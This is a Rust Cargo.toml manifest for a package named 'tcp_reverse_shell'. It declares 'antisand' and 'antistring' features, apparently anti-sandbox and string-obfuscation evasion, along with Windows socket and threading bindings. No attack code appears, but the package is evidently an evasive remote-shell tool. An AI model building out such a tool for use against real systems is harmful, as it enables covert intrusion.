[package]
name = "tcp_reverse_shell"
version = "1.2.0"
edition = "2021"
authors = ["Kevin Conley <koins@duck.com>"]
rust-version = "1.59"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[features]
antisand = ["rco_utils/antisand"]
antistring = ["rco_utils/antistring"]

[dependencies]
rco_config = {path = "../rco_config"}
rco_utils = {path = "../rco_utils"}

[target.'cfg(windows)'.dependencies]
windows.version = ">=0.35.0"
windows.features = [
    "Win32_Foundation",
    "Win32_Security",
    "Win32_Networking_WinSock",
    "Win32_System_Threading" ]
